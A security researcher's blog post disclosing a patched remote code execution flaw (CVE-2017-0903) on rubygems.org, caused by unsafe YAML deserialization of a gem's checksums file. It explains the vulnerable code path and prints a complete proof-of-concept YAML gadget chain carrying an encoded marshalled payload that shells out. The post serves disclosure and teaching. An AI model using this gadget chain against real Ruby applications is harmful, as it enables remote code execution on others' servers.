Remote Code Execution on rubygems.org

tl;dr Remote code execution via a deserialization vulnerability on rubygems.org, a very popular hosting service for ruby dependencies. A fix was rolled out quickly. Read the official announcement here. The issue is tracked as CVE-2017-0903.

If you have ever written a ruby application, it is very likely that you have interacted with rubygems.org. You’ve probably even trusted that site to run arbitrary programs on your computer. When you run, for example, gem install rails, the gem utility fetches the rails gem and all of its dependencies from rubygems.org, and installs everything into the appropriate places. Anyone can publish gems there after making an account.

Rubygems.org is itself a rails application with a clearly laid out responsible disclosure policy.

Vulnerability

Ruby gems are actually just tar archives, so running tar -xvf foo.gem will ordinarily leave you with three files:

metadata.gz
data.tar.gz
checksums.yaml.gz

These files are pretty much what they look like. All are gzipped. metadata.gz contains a YAML file with information about the gem like its name, author, version, and so on. data.tar.gz contains another tar archive with all the source code. checksums.yaml.gz contains a YAML file with some cryptographic hashes of the gem’s contents.
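
To make that layout concrete, here is a minimal sketch that builds a tiny in-memory archive with the same three entry names and lists them back, using the tar classes that ship with rubygems. The helper names (build_fake_gem, entry_names) are made up for this illustration, and the entry bodies are placeholder bytes rather than real gzipped data.

```ruby
require 'rubygems/package'
require 'stringio'

# Build a small tar archive in memory with the given entry names.
# The bodies are placeholder bytes, not real gzipped content.
def build_fake_gem(names)
  archive = StringIO.new(String.new)
  Gem::Package::TarWriter.new(archive) do |tar|
    names.each do |name|
      tar.add_file_simple(name, 0o444, 4) { |entry_io| entry_io.write('fake') }
    end
  end
  archive.rewind
  archive
end

# Collect the entry names, roughly what listing the archive with tar shows.
def entry_names(archive)
  names = []
  Gem::Package::TarReader.new(archive) do |reader|
    reader.each { |entry| names << entry.full_name }
  end
  names
end

puts entry_names(build_fake_gem(%w[metadata.gz data.tar.gz checksums.yaml.gz]))
```

Note that the reader walks the archive through its #each method, which becomes relevant later on.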

I was surprised to learn that parsing untrusted YAML is dangerous. I had always figured it was a benign interchange format like JSON. In fact, YAML allows for the encoding of arbitrary objects, much like python’s pickle.
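
A small sketch of what "arbitrary objects" means in practice. Greeter is a hypothetical class defined only for this example, and permissive_load is a made-up helper that picks whichever permissive loader the installed Psych offers (newer releases call it YAML.unsafe_load, while at the time of this post it was plain YAML.load).

```ruby
require 'yaml'

# Hypothetical class, defined only for this illustration.
class Greeter
  attr_reader :name

  def initialize(name)
    @name = name
  end
end

# Use the permissive loader under whichever name this Psych version has.
def permissive_load(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

document = "--- !ruby/object:Greeter\nname: world\n"

greeter = permissive_load(document)
puts greeter.class # the tag in the document chose the class
puts greeter.name  # instance variables were filled in from the document

begin
  YAML.safe_load(document)
rescue Psych::DisallowedClass => e
  puts "safe_load refused: #{e.message}"
end
```

The object is built without #initialize ever being called, so any invariants a constructor would normally enforce are simply skipped.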

When you upload a gem to rubygems.org, the application calls Gem::Package.new(body).spec. The rubygems gem, where this method lives, uses unsafe calls to YAML.load to load the YAML files in the gem.

However, the authors of rubygems.org knew this (probably as a result of this incident), and as of 2013 were monkey-patching the YAML and gem parsing libraries to only allow the deserialization of a whitelist of classes, eventually switching to using Psych.safe_load in 2015.

Unfortunately, the monkey-patching was insufficient, since it only patched the Gem::Specification#from_yaml method. If we check out what actually happens in that call to #spec, we see that it calls #verify, the important parts of which are reproduced below:

# ...
  @gem.with_read_io do |io|
    Gem::Package::TarReader.new io do |reader|
      read_checksums reader

      verify_files reader
    end
  end

  verify_checksums @digests, @checksums
# ...

Then, in #read_checksums:

# ...
  Gem.load_yaml

  @checksums = gem.seek 'checksums.yaml.gz' do |entry|
    Zlib::GzipReader.wrap entry do |gz_io|
      YAML.load gz_io.read # oops
    end
  end
# ...
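
For contrast, here is a sketch of the same read path using YAML.safe_load. This is not the fix that was actually shipped, just an illustration of the idea; gzip_string and read_checksums_safely are hypothetical helpers, and the gzipped input is built in memory instead of coming from a gem.

```ruby
require 'yaml'
require 'zlib'
require 'stringio'

# Hypothetical helper: gzip a string in memory, standing in for the
# checksums.yaml.gz entry of an uploaded gem.
def gzip_string(text)
  buffer = StringIO.new(String.new)
  Zlib::GzipWriter.wrap(buffer) { |gz| gz.write(text) }
  buffer.string
end

# Same shape as the snippet above, but with YAML.safe_load, which by
# default only builds plain types such as strings, arrays and hashes.
def read_checksums_safely(gzipped_bytes)
  Zlib::GzipReader.wrap(StringIO.new(gzipped_bytes)) do |gz_io|
    YAML.safe_load(gz_io.read)
  end
end

benign = gzip_string("---\nSHA1:\n  metadata.gz: abc123\n")
p read_checksums_safely(benign)

hostile = gzip_string("--- !ruby/object:Gem::Package::TarReader\nio: foo\n")
begin
  read_checksums_safely(hostile)
rescue Psych::DisallowedClass => e
  puts "rejected: #{e.message}"
end
```

A checksums file only needs nested hashes of strings, so nothing legitimate is lost by refusing object tags here.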

OK, so we have a call to YAML.load with input that we control. How can we exploit it? Originally I tried to get my exploit code to run during the YAML.load call itself. This turned out to be harder than I had anticipated: although I could deserialize arbitrary objects, the set of methods I could get called on them was very limited. Psych, the YAML parsing library used here, would let me trigger methods like #[]=, #init_with, and #marshal_load (not Marshal.load; that would have made exploitation much easier). But for most objects, those methods don’t give an attacker much flexibility, since they usually just initialize a couple of variables and return. It seems plausible that some object in a standard rails library has a dangerous #[]= method (as there have been in the past), but I didn’t find one.
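
The hooks Psych invokes during loading can be observed with a couple of harmless recorder classes. Everything below (RecordingHash, RecordingObject, HOOK_CALLS, permissive_load) is hypothetical and exists only to log which methods the loader calls.

```ruby
require 'yaml'

# Log of the hooks the loader invoked, in order.
HOOK_CALLS = []

# A Hash subclass: the loader fills it in through #[]=.
class RecordingHash < Hash
  def []=(key, value)
    HOOK_CALLS << [:[]=, key]
    super
  end
end

# A plain object that defines #init_with: the loader calls it with a
# coder holding the mapping from the document.
class RecordingObject
  def init_with(coder)
    HOOK_CALLS << [:init_with, coder.map.keys]
  end
end

# Use the permissive loader under whichever name this Psych version has.
def permissive_load(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

permissive_load("--- !ruby/hash:RecordingHash\na: 1\n")
permissive_load("--- !ruby/object:RecordingObject\nb: 2\n")
p HOOK_CALLS
```

An attacker gets to pick the class and the arguments, but only these few entry points, which is why a directly exploitable class is hard to find.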

Instead, I looked at what happens after the load. What does the code do with that @checksums variable, which we can now set to be an instance of any in-scope class? Over in #verify_checksums:

# ...
  checksums.sort.each do |algorithm, gem_digests|
    gem_digests.sort.each do |file_name, gem_hexdigest|
      computed_digest = digests[algorithm][file_name]
# ...

So if we can build an object where calling #sort does something dangerous, we can trigger our exploit. In the end, I came up with the following proof of concept for the contents of checksums.yaml.gz. The payload that actually gets evaled is contained in the base64-encoded, DEFLATE-compressed, marshalled section at the bottom (in this case, it just shells out to run echo "oops"):

SHA1: !ruby/object:Gem::Package::TarReader
  io: !ruby/object:Gem::Package::TarReader::Entry
    closed: false
    header: 'foo'
    read: 0
    io: !ruby/object:ActiveSupport::Cache::MemoryStore
      options: {}
      monitor: !ruby/object:ActiveSupport::Cache::Strategy::LocalCache::LocalStore
        registry: {}
      key_access: {}
      data:
        '3': !ruby/object:ActiveSupport::Cache::Entry
          compressed: true
          value: !binary '\
          eJx1jrsKAjEQRbeQNT4QwQ9Q8hlTRXGL7UTFemMysIGYCZNZ0b/XYsHK8nIO\
          nDtRBGbvJDzxMuRMLABHzIzOSqD0G+jbVMQmhzfLwd4jnphebwUrE0ZAoJrz\
          YQpLE0PCRKGCmSnsWr3p0PW000S56G5eQ91cv9oDpScPC8YyRIG18WOMmGD7\
          /1X1AV+XPlQ='

Starting from the last step and working backwards to the call to #sort:

At the bottom we have an ActiveSupport::Cache::Entry object. The important thing about this object is that when its #value method is called and @compressed is true, it calls Marshal.load on DEFLATE-compressed, attacker-provided data. The unmarshalled object is constructed so that calling just about any method on it executes the attacker’s code. The exact technique used here has been written about before; here is how it works. Unfortunately, we can’t just deserialize this object directly with YAML to achieve code execution, because it undefs almost all of its methods, including the ones that allow us to set instance variables. It really needs to be loaded with Marshal.load to be useful in this context.
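
The shape of that #value behaviour can be sketched with a stand-in class. CompressedEntrySketch is hypothetical and is not the ActiveSupport source; it only mirrors the inflate-then-Marshal.load step described above, with a harmless payload.

```ruby
require 'zlib'

# Simplified stand-in, NOT the ActiveSupport implementation: when the
# entry is flagged as compressed, #value inflates and unmarshals it.
class CompressedEntrySketch
  def initialize(value, compressed)
    @value = value
    @compressed = compressed
  end

  def value
    @compressed ? Marshal.load(Zlib::Inflate.inflate(@value)) : @value
  end
end

# A harmless payload prepared the same way: marshal first, then DEFLATE.
blob = Zlib::Deflate.deflate(Marshal.dump({ 'note' => 'benign' }))
entry = CompressedEntrySketch.new(blob, true)
p entry.value
```

In the proof of concept, YAML sets the two instance variables directly, so whoever writes the document controls both the flag and the bytes handed to Marshal.load.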

Working our way up, the ActiveSupport::Cache::MemoryStore object holds that Entry, and with it our malicious marshalled object, in a hash called @data. Its parent class, ActiveSupport::Cache::Store, defines a #read method that calls #read_entry within the MemoryStore. #read_entry basically just grabs the entry out of @data and returns it. Since #read hands back the entry’s value, this is the point where the Marshal.load from the previous step fires.

The call to MemoryStore#read comes from a call to Gem::Package::TarReader::Entry#read, which itself is called by Gem::Package::TarReader#each. After the read returns, #size is called on the returned value, which our malicious unmarshalled object does not define, causing our payload to execute.
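
Why an undefined method is enough can be shown with a harmless recorder. CallRecorder is a hypothetical class that only logs the method name; the real payload object reacts to the missing method by running attacker code instead.

```ruby
# Hypothetical recorder: it inherits from BasicObject, so almost nothing
# is defined on it and nearly every call lands in method_missing.
class CallRecorder < BasicObject
  def initialize(log)
    @log = log
  end

  def method_missing(name, *_args)
    @log << name
    0 # return a number so a caller expecting a size can carry on
  end
end

log = []
fake_read_result = CallRecorder.new(log)
fake_read_result.size # the same call the tar reader makes on read's result
p log
```

The caller never has to do anything unusual: an ordinary #size call on a value it believes to be a string is all it takes.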

Finally, because Gem::Package::TarReader specifies include Enumerable, a call to its #sort method will call its #each method, starting the whole chain above.
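
The Enumerable behaviour is easy to confirm in isolation. LoggingCollection is a hypothetical class that implements nothing but #each and counts how often it runs.

```ruby
# Hypothetical class: the only iteration method it implements is #each.
class LoggingCollection
  include Enumerable

  attr_reader :each_calls

  def initialize(items)
    @items = items
    @each_calls = 0
  end

  def each
    @each_calls += 1
    @items.each { |item| yield item }
  end
end

collection = LoggingCollection.new([3, 1, 2])
p collection.sort
p collection.each_calls
```

#sort is supplied by Enumerable and has no way to gather the elements other than calling #each, so any side effect of #each runs as soon as something sorts the object.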

Conclusion

For me, one of the takeaways here is that YAML is very powerful, and sometimes used in contexts where less expressive (but safer) interchange formats like JSON might be more appropriate. Perhaps in the future, YAML.load could be modified to take a whitelist of classes as an optional parameter, making the deserialization of complex objects an opt-in behavior. YAML.load in its current state should really be named something like YAML.unsafe_load to get the point across, instead of relying on users to know when they should use YAML.safe_load.
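
For reference, an opt-in list of this kind is available on YAML.safe_load. The sketch below assumes a Psych version that accepts the permitted_classes keyword (older versions took the list as a positional argument). Later Psych releases also changed the default in the suggested direction, making YAML.load safe and moving the permissive behaviour to YAML.unsafe_load.

```ruby
require 'yaml'

document = "---\n- :ok\n- plain string\n"

# By default safe_load refuses anything beyond plain types, Symbol included.
begin
  YAML.safe_load(document)
rescue Psych::DisallowedClass => e
  puts "default: #{e.message}"
end

# Opting in to Symbol, and only Symbol, lets the same document load.
p YAML.safe_load(document, permitted_classes: [Symbol])
```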

Thanks very much to the rubygems.org team for running a responsive bug bounty program.

Shameless plug

If you’re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider joining Mastodon! It’s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!